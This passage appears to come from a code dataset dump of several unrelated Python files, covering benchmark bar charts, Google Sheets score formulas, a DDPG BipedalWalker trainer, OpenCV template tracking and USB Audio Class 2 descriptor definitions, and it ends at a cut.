p2 = plt.bar(index, values, width, label=\"ROC\", color=\"#87CEFA\")\n# set the x-axis label\nplt.xlabel('algorithm')\n# set the y-axis label\nplt.ylabel('ROC')\n# add the title\nplt.title('')\n# add the ticks for both axes\nplt.xticks(index, ('KNN', 'LOF', 'PCA', 'IForest'))\n# plt.yticks(np.arange(0, 10000, 10))\n# add the legend\nplt.legend(loc=\"upper right\")\nplt.show()\n\n\n\n\nplt.figure(figsize=(10, 10), dpi=80)\n# create another subplot with a 1 x 1 layout\n# plt.subplot(1, 1, 1)\n# total number of bars\nN = 4\n# sequence containing the value for each bar\nvalues = prn_all\n# sequence containing the index of each bar\nindex = np.arange(N)\n# width of the bars\nwidth = 0.45\n# draw the bar chart\np2 = plt.bar(index, values, width, label=\"PRN\", color=\"#8000FA\")\n# set the x-axis label\nplt.xlabel('algorithm')\n# set the y-axis label\nplt.ylabel('PRN')\n# add the title\nplt.title('')\n# add the ticks for both axes\nplt.xticks(index, ('KNN', 'LOF', 'PCA', 'IForest'))\n# plt.yticks(np.arange(0, 10000, 10))\n# add the legend\nplt.legend(loc=\"upper right\")\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"abalone_benchmarks_analysis.py","file_name":"abalone_benchmarks_analysis.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364634934","text":"import sys\nimport re\nimport gspread\nimport time\nfrom gspread_formatting import *\nfrom datetime import date\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nscope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('is2800-1166f40193c8.json', scope)\n\n# Authorize\ngsheet = gspread.authorize(credentials)\n# Open workbook\n#workbook = gsheet.open('Excel_Chapter4_Scorecard_007')\nworkbook = gsheet.open('test')\n# Get worksheets\nworksheets = workbook.worksheets() \n\nbody = {\"requests\": []}\n\ndef getScaledScore(sID, target):\n    colDLength = len(target)\n    target = colDLength + 1\n    #score = \"=D\" + str(target-1) + \"/100*25\"\n    score = \"=D\" + str(colDLength) + \"/100*25\"\n    body['requests'].append(\n        {\"updateCells\": {\n            'range': {\n                \"sheetId\": sID,\n                \"startRowIndex\": target - 1 ,\n                \"endRowIndex\": target,\n                \"startColumnIndex\": 3,\n                \"endColumnIndex\": 4\n            },\n            'rows': [{\n                \"values\": [{\n                    \"userEnteredValue\": {\n                        \"formulaValue\": score\n                    },\n                    \"userEnteredFormat\": {\n                        \"textFormat\": {\n                            \"bold\": True\n                        }\n                    }\n                }]\n            }],\n            \"fields\": \"*\"\n        }}\n    )\n    #return body\n\n##zeroValues = []\n#Loop through column D values and get the index for zero values\nstart = 11 \nfor index, item in enumerate(worksheets):\n    source = str(item)\n    if index >= start:\n        columnDItems = item.col_values(4)\n        colDLength = len(columnDItems)\n        sID = re.search('id:(.+?)>', source).group(1)\n        colDTarget = colDLength + 1\n        getScaledScore(sID, columnDItems)\n\nprint(body)\nworkbook.batch_update(body=body)","sub_path":"get_scaled_score_old.py","file_name":"get_scaled_score_old.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"399202629","text":"# -*- coding: utf-8 -*-\n# created by inhzus\n\nimport re\n\nfrom colorama import Fore, Style\n\nfrom juq.serializer import DocDetailSerializer\n\n\ndef filter_empty_params(params: dict):\n    params.pop('_')\n    return {k: v for k, v in params.items() if v or isinstance(v, int)}\n\n\ndef toc_line_repr(line: dict):\n    return f'{Fore.RED}|-' * line['depth'] + \\\n           f'{Style.RESET_ALL}' \\\n           f'id: {Fore.BLUE}{line[\"id\"]}{Style.RESET_ALL}\\t' \\\n           f'slug: {Fore.BLUE}{line[\"slug\"]}{Style.RESET_ALL}\\t' \\\n           f'title: 
{Fore.BLUE}{line[\"title\"]}{Style.RESET_ALL}'\n\n\ndef toc_repr(toc_: list):\n if not toc_:\n return ''\n return '\\n'.join(map(toc_line_repr, toc_))\n\n\n# e.g. ' - [标题](slug \"12312\")'\n# ' ', '标题', 'slug', '12312'\npattern = re.compile(r'^(?P\\s*?)' # get depth on blank numbers\n r'-\\s'\n r'\\[(?P.*)\\]' # title between square brackets\n r'\\((?P<slug>\\S*)' # slug after left bracket\n r'\\s'\n r'\"(?P<id>\\d*)\"\\)', # id before right bracket\n re.X)\n\n\ndef load_toc_line(line: str):\n matches = pattern.match(line)\n return {'depth': int(len(matches['depth']) / 2), 'title': matches['title'],\n 'slug': matches['slug'], 'id': matches['id']}\n\n\ndef load_toc(toc_: str):\n # for line in toc_.split('\\n'):\n # yield load_toc_line(line)\n if not toc_:\n return []\n return list(map(load_toc_line, toc_.split('\\n')))\n\n\ndef dump_toc_line(line: dict):\n return ' ' * line['depth'] + \\\n f'- [{line[\"title\"]}]' \\\n f'({line[\"slug\"]} \\\"{line[\"id\"]}\\\")'\n\n\ndef dump_toc(toc_list):\n return '\\n'.join(map(dump_toc_line, toc_list))\n\n\ndef change_doc_toc(toc: str, insert: DocDetailSerializer, before: str, after: str, depth: int = 0):\n\n if before:\n after = before\n if toc:\n src_toc = load_toc(toc if toc else '')\n else:\n src_toc = []\n toc_list = [line for line in src_toc if line['id'] != str(insert.id)]\n insert_toc = {'depth': depth, 'title': insert.title, 'slug': insert.slug, 'id': insert.id}\n if not before and not after:\n toc_list.append(insert_toc)\n return toc_list\n # Find the pos to insert after/before\n for i, line in enumerate(toc_list):\n if line['id'] == after:\n idx = i if before else i + 1\n break\n else:\n return src_toc\n toc_list.insert(idx, insert_toc)\n return toc_list\n","sub_path":"juq/service/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"520897143","text":"# Maxim Shelopuhin\n# DDPG on Bipedal Walker\n# \n#\tNoise function based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\n#\t\t\t\t\tand https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py\n#\tNetwork architecture based on https://github.com/vy007vikas/PyTorch-ActorCriticRL\n#\tAlgorithm based on \"Continuous control with deep reinforcement learning\"\n#\t\t\t\t\tby Timothy P. Lillicrap, Jonathan J. 
Hunt, Alexander Pritzel, Nicolas Heess, Tom Erez, Yuval Tassa, David Silver, Daan Wierstra\n#\t\nimport gym\nfrom Memory import Memory\nfrom ActorCritic import ActorCritic\nimport numpy as np\nimport gc\nimport matplotlib.pyplot as plt\nimport sys\nimport time\n\nMAX_EPISODES = 5000\nMAX_STEPS = 10000\nMAX_BUFFER = 200000\nMAX_TOTAL_REWARD = 300\n\n#Train for a single run\n# Training done with exploration = true\ndef env_run(env, episode, trainer, memory, train):\n\tstate = env.reset()\n\tepoch_reward = 0\n\tprint(episode)\n# Take step\n\tfor step in range(MAX_STEPS):\n\t\tif not train:\n\t\t\tenv.render()\n\t\taction = trainer.get_action(state, train)\n\t\tnext_state, reward, done, _ = env.step(action)\n\t\tepoch_reward +=reward\n\t\tif train:\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tmemory.remember((state, action, reward, next_state))\n\t\t\tstate = next_state\n\t\t\ttrainer.optimize()\n\t\telse:\n\t\t\tif done:\n\t\t\t\tenv.close()\n\t\t\t\tprint(\"\\n Testing agent got a reward of :\",epoch_reward)\n\t\t\t\tbreak\n\t\t\n\t\tstate = next_state\n\tgc.collect()\n\tif episode%100 == 1:\n\t\ttrainer.save_models(episode)\n\treturn epoch_reward\n\ndef prepopulate_memory(memory, env):\n\tstate = env.reset()\n\tfor _ in range(MAX_BUFFER):\n\t# Take a random action\n\t\taction = env.action_space.sample()\n\t\tnext_state, reward, done, _ = env.step(action)\n\t\tmemory.remember((state, action, reward, next_state))\n\t\tif done:\n\t\t\tstate = env.reset()\n\t\telse:\n\t\t\tstate = next_state\n\n# Create environment\n# Read arguments\n# Depending on args:\n#\tdecide if training\n#\tdetermine the testing interval\n#\tdetermine which file to load\n#\toutput stats to the screen\ndef main(args):\n\n\ttraining = int(args[1])\n\ttest_interval = int(args[2])\n\tload = int(args[3])\n\n\tenv = gym.make('BipedalWalker-v2')\n\tmemory = None\n\n\tif training == 1:\n\t\tmemory = Memory(MAX_BUFFER)\n\t\tprepopulate_memory(memory, env)\n\t\t\n\trewards = []\n\tstart_time = time.time()\n\tmax_reward = 0\n\n\ttrainer = ActorCritic(env.observation_space.shape[0], env.action_space.shape[0], memory, load)\n\n\tfor episode in np.arange(MAX_EPISODES):\n\t\tif training == 1:\n\t\t\tenv_run(env, episode, trainer, memory, True)\n\t\tif episode%test_interval == 0:\n\t\t\tmax_reward += env_run(env, episode, trainer, None, False)\n\t\t\trewards.append(max_reward/((episode/test_interval)+1))\n\tplt.plot(rewards)\n\tplt.show()\n\n# use this to plot Ornstein Uhlenbeck random motion\nif __name__ == '__main__':\n\tmain(sys.argv)","sub_path":"DDPG/DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"325947004","text":"import itertools\n\ndef altsum(ls):\n    add=True\n    s=0\n    for l in ls:\n        if (add):\n            s+=l\n        else:\n            s-=l\n        add=not add\n    return s\n\ndef main():\n    print (\"Running\")\n    digits = list(range(10))\n    perms = itertools.permutations(digits)\n    count = 0\n    for ps in perms:\n        if ps[0] > 0:\n            s = altsum(ps) \n            if (0 == s):\n                count += 1\n            if (0 == s%11):\n                count+=1\n    return count\n\nif __name__==\"__main__\":\n    main()\n\n\n","sub_path":"Python/E491/E491/E491.py","file_name":"E491.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"526316433","text":"#Encoding:UTF-8\n#Author: Manuel Zavala Gómez\n#Calculation of a worker's pay\n\ndef main():\n    normal=int(input(\"Regular hours worked\"))\n    extra=int(input(\"Overtime hours 
worked\"))\n    pago=int(input(\"Pay per regular hour\"))\n    print(\"Regular hours:\",normal)\n    print(\"Overtime hours:\",extra)\n    print(\"Pay per hour:$%.2f\"% pago) \n    calcularNormal(normal,pago)\n    calcularExtra(normal,extra,pago) \ndef calcularNormal(normal,pago):\n    a=normal*pago\n    print(\"Regular weekly pay:$%.2f\"% a)\ndef calcularExtra(normal,extra,pago):\n    b=(pago/2)+ pago\n    c= b*extra\n    d= (normal*pago)+c\n    print(\"Overtime weekly pay:$%.3f\" % c)\n    print(\"Total weekly pay:$%.2f\"%d) \nmain() ","sub_path":"calculopago.py","file_name":"calculopago.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329450992","text":"import cv2\nimport numpy as np\nimport os\n\ndef template_matching(image,template):\n\t# convert both the image and template to grayscale\n\timageGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\ttemplateGray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n\n\t#print(\"performing template matching...\")\n\t#methods:- cv2.TM_SQDIFF(take minLoc)--------- cv2.TM_CCORR_NORMED(take maxLoc)\n\tresult = cv2.matchTemplate(imageGray, templateGray, cv2.TM_SQDIFF) \n\t(minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(result)\n\n\t# determine the starting and ending (x, y)-coordinates of the\n\t# bounding box\n\t(startX, startY) = minLoc\n\tendX = startX + template.shape[1]\n\tendY = startY + template.shape[0]\n\n\t# draw the bounding box on the image\n\tcv2.rectangle(image, (startX, startY), (endX, endY), (255, 0, 0), 3)\n\treturn image,(startX,startY,endX,endY)\n\t\n\nif __name__==\"__main__\":\n\tgt = np.genfromtxt(\"../data/Liquor/groundtruth_rect.txt\",delimiter=',')\n\tcoord = gt[0]\n\timg_path = \"../data/Liquor/img/\"\n\timgname = \"0001.jpg\"\n\tx,y,w,h = int(coord[0]),int(coord[1]),int(coord[2]),int(coord[3])\n\n\timage = cv2.imread(img_path+imgname)\n\ttemplate = image[y:y+h,x:x+w]\n\n\tcv2.imwrite(\"./template.png\",template)\n\tfilenames = os.listdir(img_path)\n\tfilenames.sort()\n\n\tiou = 0.0\n\tn = 0\n\tfile1 = open('./pred_liquor.txt', 'w')\n\tfor i,filename in enumerate(filenames):\n\t\tprint(filename)\n\t\tcoord = gt[i]\n\t\tx1,y1,x2,y2 = int(coord[0]),int(coord[1]),int(coord[0])+int(coord[2]),int(coord[1])+int(coord[3])\n\n\t\timg = cv2.imread(img_path+filename)\n\t\timg ,(px1,py1,px2,py2) = template_matching(img,template)\n\n\t\ts = str(px1)+\",\"+str(py1)+\",\"+str(template.shape[1])+\",\"+str(template.shape[0])\n\t\tfile1.write(s+'\\n')\n\t\tcv2.imwrite(\"./block_based_predicted/liquor/\"+filename,img)\n\t\tn+=1\n\t\n","sub_path":"Assignment2/Q1/liquor.py","file_name":"liquor.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"215112809","text":"#\n# This file is part of usb-protocol.\n#\n\"\"\" descriptors specific to USB version 2\n    NOTE: This is not complete yet and will be extended as needed\n\"\"\"\n\nfrom usb_protocol.emitters import descriptor\nfrom enum import IntEnum\n\nimport construct\n\nfrom ..descriptor import \\\n    DescriptorField, DescriptorNumber, DescriptorFormat\n\nfrom .uac import *\n\nclass ClockAttributes(IntEnum):\n    EXTERNAL_CLOCK = 0b00\n    INTERNAL_FIXED_CLOCK = 0b01\n    INTERNAL_VARIABLE_CLOCK = 0b10\n    INTERNAL_PROGRAMMABLE_CLOCK = 0b11\n\nclass ClockFrequencyControl(IntEnum):\n    NOT_PRESENT = 0b00\n    HOST_READ_ONLY = 0b01\n    HOST_PROGRAMMABLE = 0b11\n\nclass CopyProtectControl(IntEnum):\n    NOT_PRESENT = 0b00\n    HOST_READ_ONLY = 0b10\n    HOST_PROGRAMMABLE 
= 0b11\n\nclass ConnectorControl(IntEnum):\n NOT_PRESENT = (0b00) << 2\n HOST_READ_ONLY = (0b10) << 2\n HOST_PROGRAMMABLE = (0b11) << 2\n\nclass OverloadControl(IntEnum):\n NOT_PRESENT = (0b00) << 4\n HOST_READ_ONLY = (0b10) << 4\n HOST_PROGRAMMABLE = (0b11) << 4\n\nclass ClusterControl(IntEnum):\n NOT_PRESENT = (0b00) << 6\n HOST_READ_ONLY = (0b10) << 6\n HOST_PROGRAMMABLE = (0b11) << 6\n\nclass UnderflowControl(IntEnum):\n NOT_PRESENT = (0b00) << 8\n HOST_READ_ONLY = (0b10) << 8\n HOST_PROGRAMMABLE = (0b11) << 8\n\nclass OverflowControl(IntEnum):\n NOT_PRESENT = (0b00) << 10\n HOST_READ_ONLY = (0b10) << 10\n HOST_PROGRAMMABLE = (0b11) << 10\n\n\nclass FormatTypes(IntEnum):\n FORMAT_TYPE_UNDEFINED = 0x00\n FORMAT_TYPE_I = 0x01\n FORMAT_TYPE_II = 0x02\n FORMAT_TYPE_III = 0x03\n FORMAT_TYPE_IV = 0x04\n EXT_FORMAT_TYPE_I = 0x81\n EXT_FORMAT_TYPE_II = 0x82\n EXT_FORMAT_TYPE_III = 0x83\n\nclass TypeIFormats(IntEnum):\n PCM = (1 << 0)\n PCM8 = (1 << 1)\n IEEE_FLOAT = (1 << 2)\n ALAW = (1 << 3)\n MULAW = (1 << 4)\n TYPE_I_RAW_DATA = (1 << 31)\n\nclass TypeIIFormats(IntEnum):\n MPEG = (1 << 0)\n AC_3 = (1 << 1)\n WMA = (1 << 2)\n DTS = (1 << 3)\n TYPE_II_RAW_DATA = (1 << 31)\n\nclass TypeIIIFormats(IntEnum):\n IEC61937_AC_3 = (1 << 0)\n IEC61937_MPEG_1_Layer1 = (1 << 1)\n IEC61937_MPEG_1_Layer2_3 = (1 << 2) # same bit!\n IEC61937_MPEG_2_NOEXT = (1 << 2) # same bit!\n IEC61937_MPEG_2_EXT = (1 << 3)\n IEC61937_MPEG_2_AAC_ADTS = (1 << 4)\n IEC61937_MPEG_2_Layer1_LS = (1 << 5)\n IEC61937_MPEG_2_Layer2_3_LS = (1 << 6)\n IEC61937_DTS_I = (1 << 7)\n IEC61937_DTS_II = (1 << 8)\n IEC61937_DTS_III = (1 << 9)\n IEC61937_ATRAC = (1 << 10)\n IEC61937_ATRAC2_3 = (1 << 11)\n TYPE_III_WMA = (1 << 12)\n\nclass TypeIVFormats(IntEnum):\n PCM = (1 << 0)\n PCM8 = (1 << 1)\n IEEE_FLOAT = (1 << 2)\n ALAW = (1 << 3)\n MULAW = (1 << 4)\n MPEG = (1 << 5)\n AC_3 = (1 << 6)\n WMA = (1 << 7)\n IEC61937_AC_3 = (1 << 8)\n IEC61937_MPEG_1_Layer1 = (1 << 9)\n IEC61937_MPEG_1_Layer2_3 = (1 << 10) # same bit!\n IEC61937_MPEG_2_NOEXT = (1 << 10) # same bit!\n IEC61937_MPEG_2_EXT = (1 << 11)\n IEC61937_MPEG_2_AAC_ADTS = (1 << 12)\n IEC61937_MPEG_2_Layer1_LS = (1 << 13)\n IEC61937_MPEG_2_Layer2_3_LS = (1 << 14)\n IEC61937_DTS_I = (1 << 15)\n IEC61937_DTS_II = (1 << 16)\n IEC61937_DTS_III = (1 << 17)\n IEC61937_ATRAC = (1 << 18)\n IEC61937_ATRAC2_3 = (1 << 19)\n TYPE_III_WMA = (1 << 20)\n IEC60958_PCM = (1 << 21)\n\nclass SidebandProtocols(IntEnum):\n PROTOCOL_UNDEFINED = 0x00\n PRES_TIMESTAMP_PROTOCOL = 0x02\n\nclass AudioClassSpecificASInterfaceDescriptorSubtypes(IntEnum):\n AS_DESCRIPTOR_UNDEFINED = 0x00\n AS_GENERAL = 0x01\n FORMAT_TYPE = 0x02\n ENCODER = 0x03\n DECODER = 0x04\n\nInterfaceAssociationDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(8, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(DescriptorTypes.INTERFACE_ASSOCIATION),\n \"bFirstInterface\" / DescriptorField(description=\"Interface number of the first interface that is associated with this function.\", default=0),\n \"bInterfaceCount\" / DescriptorField(description=\"Number of contiguous interfaces that are associated with this function\"),\n \"bFunctionClass\" / DescriptorNumber(AudioFunctionClassCode.AUDIO_FUNCTION),\n \"bFunctionSubClass\" / DescriptorField(description=\"function subclass code (currently not used in uac2)\", default=AudioFunctionCategoryCodes.FUNCTION_SUBCLASS_UNDEFINED), \n \"bFunctionProtocol\" / DescriptorNumber(AudioFunctionProtocolCodes.AF_VERSION_02_00),\n \"iFunction\" / DescriptorField(description=\"Index of a 
string descriptor that describes this interface\", default=0),\n)\n\nStandardAudioControlInterfaceDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(9, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(DescriptorTypes.INTERFACE),\n    \"bInterfaceNumber\" / DescriptorField(description=\"ID of the control interface\"),\n    \"bAlternateSetting\" / DescriptorField(description=\"alternate setting for the interface (must be 0)\", default=0),\n    \"bNumEndpoints\" / DescriptorField(description=\"number of endpoints used by this interface (excluding endpoint 0). This number is either 0 or 1 if the optional interrupt endpoint is present\", default=0),\n    \"bInterfaceClass\" / DescriptorNumber(AudioInterfaceClassCode.AUDIO),\n    \"bInterfaceSubClass\" / DescriptorNumber(AudioInterfaceSubclassCodes.AUDIO_CONTROL),\n    \"bInterfaceProtocol\" / DescriptorNumber(AudioInterfaceProtocolCodes.IP_VERSION_02_00),\n    \"iInterface\" / DescriptorField(description=\"index of string descriptor describing this interface\", default=0),\n)\n\nClassSpecificAudioControlInterfaceDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(9, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.HEADER),\n    \"bcdADC\" / DescriptorField(description=\"Audio Device Class specification release version\", default=2.0),\n    \"bCategory\" / DescriptorField(description=\"primary use of this audio function (see AudioFunctionCategoryCodes)\", default=AudioFunctionCategoryCodes.IO_BOX),\n    \"wTotalLength\" / DescriptorField(description=\"total number of bytes for the class specific audio control interface descriptor; includes the combined length of this descriptor header and all Clock Source, Unit and Terminal descriptors\"),\n    \"bmControls\" / DescriptorField(description=\"D1..0: latency control\", default=0),\n)\n\nClockSourceDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(8, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.CLOCK_SOURCE),\n    \"bClockID\" / DescriptorField(description=\"ID of the clock source entity within the audio function (used in requests)\"),\n    \"bmAttributes\" / DescriptorField(description=\"D1..0: clock type (see ClockAttributes)\"),\n    \"bmControls\" / DescriptorField(description=\"D1..0: clock frequency control (D1..0: see ClockFrequencyControl, D3..2: clock validity control (0))\", default=ClockFrequencyControl.NOT_PRESENT),\n    \"bAssocTerminal\" / DescriptorField(description=\"ID of the terminal which is associated with this clock\", default=0),\n    \"iClockSource\" / DescriptorField(description=\"index of the string description of this clock source\", default=0),\n)\n\nInputTerminalDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(17, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.INPUT_TERMINAL),\n    \"bTerminalID\" / DescriptorField(description=\"unique identifier for the terminal within the audio function (used in requests)\"),\n    \"wTerminalType\" / DescriptorField(description=\"a value of one of the terminal types Enums (eg InputTerminalTypes, ExternalTerminalTypes)\"),\n    \"bAssocTerminal\" / DescriptorField(description=\"ID of the associated output terminal\", default=0),\n    \"bCSourceID\" / 
DescriptorField(description=\"ID of the clock which is connected to this terminal\"),\n    \"bNrChannels\" / DescriptorField(description=\"number of logical output channels in the terminal’s output channel cluster\"),\n    \"bmChannelConfig\" / DescriptorField(description=\"describes the spatial location of the logical channels\", default=0),\n    \"bmControls\" / DescriptorField(description=\"OR combination of ClockFrequencyControl, CopyProtectControl, ConnectorControl, ClusterControl, UnderflowControl and OverflowControl\", default=0),\n    \"iChannelNames\" / DescriptorField(description=\"string descriptor index of the first logical channel name\", default=0),\n    \"iTerminal\" / DescriptorField(description=\"ID of the input terminal string description\", default=0)\n)\n\nOutputTerminalDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(12, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.OUTPUT_TERMINAL),\n    \"bTerminalID\" / DescriptorField(description=\"unique identifier for the terminal within the audio function.\"),\n    \"wTerminalType\" / DescriptorField(description=\"a value of one of the terminal types Enums (eg OutputTerminalTypes, ExternalTerminalTypes)\"),\n    \"bAssocTerminal\" / DescriptorField(description=\"ID of the associated input terminal\", default=0),\n    \"bSourceID\" / DescriptorField(description=\"ID of the unit or terminal which is connected to this terminal\"),\n    \"bCSourceID\" / DescriptorField(description=\"ID of the clock which is connected to this terminal\"),\n    \"bmControls\" / DescriptorField(description=\"OR combination of ClockFrequencyControl, CopyProtectControl, ConnectorControl, UnderflowControl>>2 and OverflowControl>>2\", default=0),\n    \"iTerminal\" / DescriptorField(description=\"ID of the output terminal string description\", default=0)\n)\n\nAudioStreamingInterfaceDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(9, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(DescriptorTypes.INTERFACE),\n    \"bInterfaceNumber\" / DescriptorField(description=\"ID of the streaming interface\"),\n    \"bAlternateSetting\" / DescriptorField(description=\"alternate setting number for the interface\", default=0),\n    \"bNumEndpoints\" / DescriptorField(description=\"Number of data endpoints used (excluding endpoint 0). 
Can be: 0 (no data endpoint); 1 (data endpoint); 2 (data + explicit feedback endpoint)\", default=0),\n    \"bInterfaceClass\" / DescriptorNumber(AudioInterfaceClassCode.AUDIO),\n    \"bInterfaceSubClass\" / DescriptorNumber(AudioInterfaceSubclassCodes.AUDIO_STREAMING),\n    \"bInterfaceProtocol\" / DescriptorNumber(AudioInterfaceProtocolCodes.IP_VERSION_02_00),\n    \"iInterface\" / DescriptorField(description=\"index of a string descriptor describing this interface (0 = unused)\", default=0)\n)\n\nClassSpecificAudioStreamingInterfaceDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(16, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.AS_GENERAL),\n    \"bTerminalLink\" / DescriptorField(description=\"the ID of the terminal to which this interface is connected\"),\n    \"bmControls\" / DescriptorField(description=\"D1..0: active alternate setting control; D3..2: valid alternate settings control; D7..4: reserved, must be 0\", default=0),\n    \"bFormatType\" / DescriptorField(description=\"see FormatTypes\"),\n    \"bmFormats\" / DescriptorField(description=\"audio data formats which can be used with this interface\", length=4),\n    \"bNrChannels\" / DescriptorField(description=\"Number of physical channels in the AS Interface audio channel cluster\"),\n    \"bmChannelConfig\" / DescriptorField(description=\"spatial location of the physical channels\", default=0),\n    \"iChannelNames\" / DescriptorField(description=\"index of a string descriptor, describing the name of the first physical channel.\", default=0)\n)\n\nTypeIFormatTypeDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(6, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n    \"bFormatType\" / DescriptorNumber(FormatTypes.FORMAT_TYPE_I),\n    \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (1, 2, 3 or 4)\"),\n    \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\")\n)\n\nExtendedTypeIFormatTypeDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(9, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n    \"bFormatType\" / DescriptorNumber(FormatTypes.EXT_FORMAT_TYPE_I),\n    \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (1, 2, 3 or 4)\"),\n    \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\"),\n    \"bHeaderLength\" / DescriptorField(description=\"size of the packet header in bytes\"),\n    \"bControlSize\" / DescriptorField(description=\"size of the control channel words in bytes\"),\n    \"bSideBandProtocol\" / DescriptorField(description=\"side band protocol, see SidebandProtocols\", default=SidebandProtocols.PROTOCOL_UNDEFINED)\n)\n\nTypeIIFormatTypeDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(8, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / 
DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n    \"bFormatType\" / DescriptorNumber(FormatTypes.FORMAT_TYPE_II),\n    \"wMaxBitRate\" / DescriptorField(description=\"maximum bitrate of this interface in kbits/s\"),\n    \"wSlotsPerFrame\" / DescriptorField(description=\"number of PCM audio slots in one audio frame\")\n)\n\nExtendedTypeIIFormatTypeDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(10, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n    \"bFormatType\" / DescriptorNumber(FormatTypes.EXT_FORMAT_TYPE_II),\n    \"wMaxBitRate\" / DescriptorField(description=\"maximum bitrate of this interface in kbits/s\"),\n    \"wSamplesPerFrame\" / DescriptorField(description=\"number of PCM audio samples in one audio frame\"),\n    \"bHeaderLength\" / DescriptorField(description=\"size of the packet header in bytes\"),\n    \"bSideBandProtocol\" / DescriptorField(description=\"side band protocol, see SidebandProtocols\", default=SidebandProtocols.PROTOCOL_UNDEFINED)\n)\n\nTypeIIIFormatTypeDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(6, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n    \"bFormatType\" / DescriptorNumber(FormatTypes.FORMAT_TYPE_III),\n    \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (must be 2)\", default=2),\n    \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\"),\n)\n\nExtendedTypeIIIFormatTypeDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(8, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n    \"bDescriptorSubtype\" / 